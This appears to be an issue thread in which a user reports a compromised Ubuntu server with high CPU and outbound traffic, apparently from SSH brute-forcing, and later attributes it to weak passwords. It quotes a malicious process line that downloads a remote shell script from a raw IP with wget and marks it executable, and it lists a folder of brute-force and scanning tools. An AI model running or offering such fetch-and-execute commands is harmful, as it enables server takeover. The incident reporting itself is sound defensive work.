[security] suspicious process & files causing 100% CPU

Question

[security] suspicious process & files causing 100% CPU

Closed this issue 2 years ago · 1 comments

sabman commented 2 years ago

version: `ubuntu-22-10-x64`

observation

After deploying the CPU goes to nearly 100% and the outgoing-bandwidth is also running at 6MB/s

Investigation

We discovered a process similar to:

./brute 22 1adrian1 5000 i cd /var/tmp ; wget http://141.98.6.76:6969/tDBR4L/sc.sh ; chmod u+x sc.sh ; sed -i -e 's/\r$/

While looking for this file we discovered a directory full of suspicious scripts:

root@supabase-droplet:/var/tmp/.g/miliardu# ls
22  IPBlacklist.list  banner.log  bozn  brute  fast.sh  i  input.txt  pass  ports1  ports1fast  ports2  ranges.lst  scan.log  scan.sh

Most of these are binary files. We are conducting our internal checks to see if its something on our end but just want to get your take on it and inform you of this issue.

Answer 1 · 2023-04-18T12:55:34.000Z

ok issue's on our side :) passwords people! sorry for the alarm

version: ubuntu-22-10-x64

observation

Investigation

version: `ubuntu-22-10-x64`